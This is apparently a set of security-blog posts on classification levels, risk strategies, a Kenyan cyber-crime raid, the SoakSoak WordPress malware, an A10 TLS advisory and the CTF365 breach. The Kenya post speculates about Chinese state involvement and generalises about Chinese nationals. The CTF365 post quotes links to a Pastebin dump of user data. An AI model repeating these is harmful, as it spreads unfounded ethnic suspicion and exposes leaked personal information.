The U.S. Military Classification Scheme
The U.S. military classification scheme relies on a more complex five-level classification scheme as defined in Executive Order 12958. This posting will list the classifications and briefly describe each of them.
The U.S. military classification scheme includes the following classification levels and a description of each: Unclassified, Sensitive But Unclassified, Confidential, Secret, and Top Secret.
- Unclassified – Information that may be publically released
- Sensitive but unclassified – Unclassified information that should not be publically released because it may adversely affect national interests, conduct of DoD programs, or privacy of DoD personnel
- Confidential – information that could be reasonably expected to cause damage to national security if disclosed to unauthorized personnel
- Secret – information that could be reasonably expected to cause serious damage to national security if disclosed to unauthorized personnel
- Top Secret – information that could be reasonably expected to cause grave damage to national security if disclosed to unauthorized personnel
The Four Basic Strategies to Controlling Risks
Information security risk management in a technology environment involves the identification, analysis, assessment, control, avoidance, minimization, or elimination of unacceptable risks.
An organization must choose four basic strategies to control risks such as risk avoidance, risk transference, risk mitigation and risk acceptance. Below these for basic strategies are explained in detail.
Risk avoidance is applying safeguards that eliminate or reduce the remaining uncontrolled risks for the vulnerability. Risk avoidance can be achieved through training and education, and implementing technical security controls and safeguards. It can also be achieved through the use of policies. Risk avoidance identifies as many threats or vulnerabilities as possible and implement strategies to mitigate those threats, reducing the impact of an attack.
Risk transference is the shifting the risk to other areas or to outside entities. The overall goal is to allow someone else accept the risk. When looking at ways to transfer risk, I would evaluate things such as services. Many services can be outsources such as application services and IT services. An outside organization may be able to offer an experience in a certain areas to your organization that you simply cannot fill. Hiring an outside organization is transferring the risk to them for that development.
Risk mitigation is reducing the impact should the vulnerability be exploited. With risk mitigation it is the expectation that it is not a matter of if something happens, it is a matter of when. And when something does happen you want to have policies and procedures in place to mitigate that. These risk mitigation strategies include disaster recovery plans, incident response plans and business continuity plans.
Risk acceptance understands the consequences and accepts the risk without control or mitigation. There will always be risk. It is impossible to eliminate risk, so therefore there needs to be analysis of these things. This is achieved by determining the level of risk to the information. You also have to evaluate the probability of an attack verses the likelihood that that vulnerability will be exploited. Another way risk can be analyzed for risk acceptance is through evaluating the controls that are in place and ensuring that there are strong justifications for risk acceptance.
Dozens of Chinese Held in Kenya ‘Cyber Bust’ Dozens
At the beginning of the month, the Kenyan Police located 77 Chinese nationals operating a cyber crime network and a command center in the country’s capital, Nairobi. According to police reports, the equipment recovered from the incident are sophisticated, high-end telecommunication gadgets. The equipment can infiltrate bank accounts, ATM machines, and Kenya’s Mesa system. Mpesa is a mobile money transfer system that millions of Kenyans use on a daily basis to transfer billions of funds. In addition, another bunch of the Chinese operated an illegal radio station in the country. Similarly, police recovered microchips for ATM cards in the house. Interestingly, this massive discovery occurred accidently when the police visited the posh estate to investigate a fire incident in which one of the Chinese died. Considering the current speculations on the motives of the Chinese and the capabilities of their equipment, there is a high possibility they could ruin the country’s telecommunication systems and banking industry thus affecting millions of people.
In the recent past, the United States has accused China of waging cyber attacks on some American organizations. In particular, some experts have claimed that the Chinese government routinely hires a “vast army of hackers” to undertake different cyber related crimes. However, Beijing always rejects such accusations by stating its commitment to fight cyber crimes and espionage. In October, the Federal Bureau of Investigations reported that China is the leading country that seeks to pilfer secrets from American based companies. Therefore, the Kenyan discovery raises eyebrows concerning the role of the Chinese government in the smuggling of high-end telecommunications equipment to Kenya as well as the establishment of a mysterious command center and illegal radio station in the country. Even though the Kenyan authorities referred to the discovery as a breakthrough in cyber crime, the incident highlights lapses in Kenya’s security as well as the potentially adverse effects of technology in developing countries.
With respect to the microchips discovered during the raid, it is possible that the suspects and their employers were targeting to hack into bank accounts as well as the Mpesa system to rob Kenyan citizens of their hard-earned cash. Nonetheless, the technology was high-end thus increasing the possibility of these people hacking systems in the neighboring countries: South Sudan, Tanzania, and Uganda among others. Cyber crime involves setting up copycat websites to confuse online users so that they can send money to bank accounts of criminals. In addition, it involves identity theft—acquiring people’s personal information then using it to access bank accounts and other important things. A few months ago, commercial banks in Kenya replaced the archaic and easily hacked ATM cards with ATM cards that use chip and pin technology. Therefore, the discovery of the microchips in the raided house raises two pertinent questions. Were the Chinese nationals targeting to hack the newly introduced chip and pin enabled ATM cards? Secondly, were the old cards targeted and infiltrated but the authorities have not yet realized? From a personal perspective, Kenyan commercial banks as well as banks in the neighboring countries should review the security of the new ATM cards. There is a possibility that the high-end technology recovered from the Chinese could still penetrate the security measures embedded in the new ATM cards.
By operating an illegal radio in the country, the Chinese nationals broke Kenya’s communications law. The suspects needed to obtain a legal permit and acquire frequencies from the communications authority before they operate the private radio broadcasting services. The incident comes at the back of a Chinese company “Star times” hacking the frequencies of Kenya Broadcasting Corporation (KBC) to broadcast live matches during the last world cup tournament. Such practices can cause confusion in the country’s telecommunication system and ground all activities based on telecommunications. Operating an illegal radio station and hacking
The systems of the government’s broadcaster demonstrate the degree to which the Chinese technology dwarfs technology in many African countries. These countries should take proper measures to prevent future technology-related attacks on the telecommunication systems.
The potential effects of the illegal telecommunication equipment found in Kenya are adverse thus the Chinese government should cooperate fully with the Kenyan investigators to unravel the intention of its citizens. For the Beijing based government to prove to the world that it is committed to crackdown on cyber crime perpetrated by its nationals, the Chinese government must prove that it played no role in the incident. Moreover, the Chinese government should ensure that the law takes its cause and all suspects prosecuted accordingly.
Despite the many bilateral agreements the Chinese government has signed with many African countries, there is a need to ensure that these countries remain wary of the potential threats. For example, many Chinese nationals have taken advantage of these relations to move into different countries. With the many opportunities existing in countries like Kenya and the security lapses, unscrupulous Chinese can cause adverse harm using their sophisticated technology. Countries such as Kenya should reconsider their progress in crimes perpetrated through technological devices. Otherwise, these countries are likely to suffer from massive cyber crime incidents, interruption of communication as well as attacks on highly sensitive infrastructure such as power plants.
100,000+ WordPress Sites Compromised by SoakSoak
Google has blacklisted over 11,000 domains with this latest malware campaign from SoakSoak.ru.
This morning a massive malware campaign was initiated targeting WordPress websites. The campaign has been tagged SoakSoak because of the domain users are being redirected too.
Details on this payload can be found on the Sucuri.net Blog.
There are various threads and forums talking to this and it’s very easy to get misleading information. Here are a few things to understand:
- This email does not mean you are infected, this serves as a Public Service Announcement.
- All Sucuri systems have been updated to better detect this infection. If you get a notification please log into your account and submit a Malware Removal Request.
- If you are behind the Website Firewall (CloudProxy) you are being protected from what appears to be the attack vector.
- The attack appears to be correlated to the RevSlider vulnerability.
Sururi is actively investigating with their partners to better understand the potential access vector. As information becomes available they will disclose it.
SECURITY ADVISORY – A10 Networks – #CVE-2014-8730 #CVE-2014-8730
SECURITY ADVISORY
#CVE-2014-8730 published on December 8th, 2014
Summary Description:
Early in November, A10 Networks was notified of an issue with its implementation of TLS, which allows a padding oracle attack to be executed against it. The issue is in the way the protocol is implemented and that there is no proper padding checking in compliance with RFC 5246. This effectively introduces vulnerability similar to the one in SSLv3, where the padding is not defined as a part of the protocol specification – which opened CBC ciphers in SSLv3 to exploitation.
The vulnerability is assigned CVE-2014-8730 (http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8730).
In general, this bug can be exploited remotely – allowing an attacker to decrypt sensitive data in the SSL connection. At this point, there is no work around and it is necessary to apply the patches provided below.
Vulnerability Assessment:
Affected Platforms: ADC
Affected Software Versions: 2.6.1-GR1, 2.7.x
Mitigation Recommendations
A10 Networks recommends upgrading to the latest available patch release:
Technology
ADC
Major Release
2.6.1–‐GR1
2.7.0–‐P6
2.7.1–‐P5
2.7.2–‐P3
Fixed
2.6.1–‐GR1–‐
P13–‐SP3
2.7.0–‐P6–‐SP4
2.7.1–‐P5–‐
SP10
2.7.2–‐P3–‐SP5
Latest Patch
2.6.1–‐GR1–‐P13
2.7.0–‐P6
2.7.1–‐P5
2.7.2–‐P3
Software Updates:
Patches for the CVE-2014-3566 Poodle/SSL v3.0 vulnerability are here:
http://www.a10networks.com/support-axseries/downloads/downloads.php#CVE-2014-3566
CTF365.com Website Hacked and User Information dumped on Pastebin
Yesterday I received a strange email displayed below. The email stated, “You’ve been compromised by cyberselfie” in the subject line. The email went on further to state.
“The security of a pentesting lab… a fucking joke…and they expect people to pay for such a crappy platform where the security is shit!!!
http://pastebin.com/c5a4bb1z
http://www.zone-h.org/mirror/id/23304152
http://www.zone-h.org/mirror/id/23304154”
I knew I had created an account on CTF365.com a while ago, I had heard some really good things about the site at a security conference, so my interested peaked and I immediately went over the their site. When I got there to my surprise I was greeted with the following page.
So what is CTF365.com?
CTF365 is a “Security Training Platform for IT industry with a focus on Security Professionals, System Administrators and Web Developers”. The Platform implements CTF (Capture The Flag) concepts and leverages gamification mechanics to improve retention rate and speed up the learning/training curve.
As of this morning, the site is still not functional, but we hope they can recover soon. The site provided a great training platform to individuals interested in learning more about information security defense and attacks in a fun manner. I have reached out to the staff on CTF365.com for more information. Below are some of their resent tweet about the breach.
So far only username and email addresses were exposed. Investigation continue. #CTF365
— CTF365 (@CTF365) November 25, 2014
We’ll keep updates in here FB and G+ @securityorb Investigation continue.
— CTF365 (@CTF365) November 25, 2014
As we discover more information we will share it with you all.
